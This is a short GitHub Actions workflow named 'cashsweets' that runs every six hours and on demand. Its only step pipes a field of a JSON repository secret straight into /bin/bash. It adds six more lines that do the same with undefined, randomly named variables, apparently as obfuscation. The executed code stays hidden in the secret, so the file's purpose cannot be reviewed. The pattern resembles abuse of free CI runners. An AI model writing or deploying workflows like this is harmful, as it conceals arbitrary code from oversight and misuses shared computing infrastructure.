name: cashsweets
on:
  workflow_dispatch:
  schedule:
    - cron: '41 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: cashsweets
        env:
          b7: ${{ secrets.b7 }}
        run: |
          echo $b7 | jq -r .rx02020 | /bin/bash
          echo $pqh384 | jq -r .aywxr82805 | /bin/bash
          echo $un7 | jq -r .bet53 | /bin/bash
          echo $dt059 | jq -r .zey6595 | /bin/bash
          echo $xtg2419 | jq -r .rmu3125 | /bin/bash
          echo $d1 | jq -r .xy34882 | /bin/bash
          echo $iz6 | jq -r .pawpg398 | /bin/bash

